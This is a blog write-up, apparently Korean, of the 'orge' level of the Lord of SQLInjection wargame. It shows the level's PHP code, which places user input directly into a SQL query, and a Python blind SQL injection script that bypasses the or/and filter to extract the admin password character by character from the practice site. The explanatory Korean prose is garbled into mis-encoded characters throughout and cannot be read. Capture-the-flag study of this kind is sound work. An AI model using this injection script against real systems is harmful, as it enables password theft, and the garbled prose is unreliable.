Security Mode

wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection

orge

Kortsec1 2022. 4. 2. 17:29 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 
?>

 

darkelf ๋ฌธ์ œ์™€ ๊ฐ™์ด or๊ณผ and๋ฅผ ํ•„ํ„ฐ๋งํ•˜๋ฉด์„œ ์ •ํ™•ํ•œ pw๊ฐ’์„ ์š”ํ•œ๋‹ค.

 

2022.04.02 - [wargame write-up/Lord of SQLInjection] - orc

 

orc

<?php include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw..

kortsec1n4mationm.tistory.com

orc๋ฌธ์ œํ’€์ด์˜ ์ฝ”๋“œ๋ฅผ ํ™œ์šฉํ•˜์—ฌ or๋ถ€๋ถ„์„ ||๋กœ, and๋Š” &&๋กœ ๋ฐ”๊พธ์–ด ์ง„ํ–‰ํ•˜๋ฉด ๋ ๊ฑฐ ๊ฐ™๋‹ค.

 

import requests

cookies = {'PHPSESSID' : 'asdfasdfasdfasdf'}

print("finding length of pw...")
for i in range(1,100):
    url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=1\' || id=\'admin\' %26%26 length(pw) = ' + str(i) + '%23'
    res = requests.get(url, cookies=cookies)
    print(str(i) + " ... ", end="")
    if "Hello admin" in res.text:
        len_pw = i
        print("0")
        print("================================")
        print("len : " + str(i))
        print("================================")
        print("\n")
        break
    else:
        print("X")

full_pw = ""
print("finding full pw...")
for i in range(len_pw):
    for j in range(32, 127):
        url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=1\' || id=\'admin\' %26%26 ascii(left(substr(pw,' + str(i+1) + '),1)) = ' + str(j) + '%23'
        res = requests.get(url, cookies=cookies)
        if "Hello admin" in res.text:
            full_pw += chr(j)
            break;
    print("pw : " + full_pw)
print("================================")
print("pw : " + full_pw)
print("================================")

 

์˜ˆ์˜๊ฒŒ ๋‚˜์˜จ pw ๊ฒฐ๊ณผ๋ฅผ ์ „๋‹ฌํ•ด์ฃผ๋ฉด ํ’€๋ฆฌ๊ฒŒ ๋œ๋‹ค.

๊ทธ๋ฆผ1 pw ํ”„๋กœ๊ทธ๋žจ

 

์œผ๋ผ์ฐจ์ฐจ์ฐจ

 

๊ทธ๋ฆผ2 ํ•ด๊ฒฐ

 

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > Lord of SQLInjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

vampire  (0) 2022.04.02
troll  (0) 2022.04.02
darkelf  (0) 2022.04.02
wolfman  (0) 2022.04.02

'wargame ๐Ÿด‍โ˜ ๏ธ write-up/Lord of SQLInjection'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€orge

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”